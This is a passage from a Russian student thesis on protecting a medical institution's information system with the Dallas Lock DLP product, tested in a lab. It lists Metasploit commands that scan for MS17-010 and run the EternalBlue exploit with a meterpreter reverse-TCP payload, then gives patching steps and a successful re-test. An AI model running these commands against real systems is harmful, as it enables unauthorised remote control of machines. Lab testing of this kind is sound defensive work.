Файл: Разработка комплекса мероприятий по обеспечению.docx

ВУЗ: Не указан

Категория: Не указан

Дисциплина: Не указана

Добавлен: 23.11.2023

Просмотров: 378

Скачиваний: 2

ВНИМАНИЕ! Если данный файл нарушает Ваши авторские права, то обязательно сообщите нам.

Внедрение DLP-системы


В соответствии с Приказом №17 ФСТЭК РФ, 20.12. Меры по защите технических средств должны исключать несанкционированный доступ к стационарным техническим средствам, обрабатывающим информацию, средствам, обеспечивающим функционирование ИС, и в помещения, в которых они постоянно расположены, защиту технических средств от внешних воздействий, а также защиту информации, представленной в виде информативных электрических сигналов и физических полей. В качестве решения необходимо воспользоваться DLP-системой.

В целях проверки ИС ГБУЗ ЯНАО «Новоуренгойский психоневрологический диспансер» от НСД, необходимо сделать следующее. Для начала на ОС Windows 7 установим систему Dallas Lock 8.0-C и Dallas

Lock Server. Создадим файл «test.txt» от имени администратора с содержанием «Hello, World!», затем запретим доступ к этому файлу всем пользователям и проверим чтение файла по имени и по атрибуту $DATA, под непривилегированным пользователем (рисунок 22).


Рисунок 22 - Создание файла «test.txt» от имени администратора

Первоначально устанавливаем разрешения, затем запускаем проверку (рисунок 23).


Рисунок 23 - Проверка уязвимости

Уязвимость зафиксирована: любой пользователь может просмотреть содержимое файла, игнорируя все установленные правила.

Далее рассмотрим способность DLP-системы противостоять атакам злоумышленника. Для этого
необходимо использовать еще не обновленную версию Windows 7, где уязвимость MS17-010 не устранена. На одно АРМ установим Dallas Lock 8.0-K (рисунок 24).

Рисунок 24 - Запуск Dallas Lock 8.0-K для проверки уязвимости На второе АРМ установим Dallas Lock Server (рисунок 25):



Рисунок 25 - Запуск Dallas Lock Server для проверки уязвимости

Далее настроим между ними локальную сеть. Затем к этой же сети подключим сервер ИС и с помощью MetaSploit framework попробуем провести тестирование уязвимости Windows 7, на которой установлен Dallas Lock Server. Перед этим необходимо узнать Ip-адреса хостов, находящихся в одной сети с Kali Linux. Но при настройке локальной сети мы использовали сетевой коммутатор, поэтому сеть необходимо настроит вручную.

Для этого необходимо:

  • открываем консоль и запускаем Postgresql: service postgresql start;

  • запускаем Metasploit framework: msfconsole;

  • выбираем, какой сканер будем использовать: use auxiliary/scanner/smb/smb_ms17_010;

  • выбираем Ip-адрес, который будем сканировать: set RHOSTS 192.168.1.2;

  • командой run запускаем сканер;

Получили, что данный хост уязвим, значит пробуем его поэксплуатировать. Для этого:

  • выбираем эксплойт, который будем использовать: use exploit/windows/smb/ms17_010_eternalblue;

  • смотрим Ip-адрес АРМ: ifconfig;

  • получили адрес 192.168.1.3;

  • выбираем Ip-адрес хоста, с которого будет производиться эксплойт: set LHOST 192.168.1.3;

  • выбираем Ip-адрес удаленного хоста, который мы будем эксплуатировать командой: set RHOST 192.168.1.2;

  • выбираем полезную нагрузку, которая будет использоваться после успешного выполнения эксплойта: set payload windows/x64/meterpreter/reverse_tcp;

  • запускаем эксплойт: exploit;


Вывод представлен на рисунке 26.



Рисунок 26 - Вывод команды «exploit»

Эксплойт реализовал доступ к системе, так как курсор в командной строке поменялся на meterpreter>. Это означает, что сессия meterpreter открыта и мы получили доступ к управлению Windows 7, то есть наш удаленный эксплойт работает. Соответственно, уязвимость актуальна т.к. данным способом может воспользоваться злоумышленник.

Из рисунка 27 видно, что Dallas Lock никак не отреагировал. Единственное, в соединениях межсетевого экрана появилось исходящее соединение. Но следует обратить внимание на то, что запрос с АРМ идет по 445 порту, а само подключение к удаленному компьютеру уже по 4444 порту.


Рисунок 27 - Исходящее соединение межсетевого экрана

По результатам проведенного исследования следует отметить, что для устранения данных уязвимостей и предотвращения атак злоумышленников необходимо провести следующие операции:

  • включить автоматическое обновление Microsoft Windows;

  • провести автоматическое обновление СОВ Dallas lock и установить новые базы сигнатур (рисунок 28);

  • настроить автоматическое обновление сигнатур СОВ Dallas Lock.





Рисунок 28 - Обновление новых баз сигнатур

После
выполнения данной процедуры настройки и корректной установки Dallas Lock необходимо повторно проверить систему.

    1. 1   ...   4   5   6   7   8   9   10   11   ...   15

Тестирование эффективности проекта системы защиты



      1. Проверка эффективности проекта системы защиты


Настроенный проект защиты включает с состав DLP-систему, антивирус и межсетевой экран. Данные средства размещаются в сети

учреждения, обеспечивая комплексную защиту от внутренних и внешних угроз. Схема расположения компонентов защиты ГБУЗ ЯНАО

«Новоуренгойский психоневрологический диспансер» в сети представлена на рисунке 29.



Рисунок 29 Схема сети после внедрения СЗИ

Эксплойт был вновь запущен и на этот раз уязвимости обнаружено не было – вирус не получил доступ к системе (рисунок 30).



Рисунок 30 Ошибка при получении доступа с установленной СЗИ

После внедрения данной системы защиты были устранены угрозы, описанные в приложении. Система работает взаимосвязано и не требует обновления в данный момент.

Таким образом, настроив данные параметры можно обезопасить ИС ГБУЗ ЯНАО «Новоуренгойский психоневрологический диспансер» от возможного риска НСД, как со стороны посторонних лиц, так и со стороны недобросовестных сотрудников. Описанная СЗИ располагает широким функционалом, способным противостоять самым разнообразным угрозам и легко адаптируется под любую ИТ-инфраструктуру организации.
      1. Нормативно-правовое обеспечение защиты информации


Общую структуру нормативной базы в области обеспечения информационной безопасности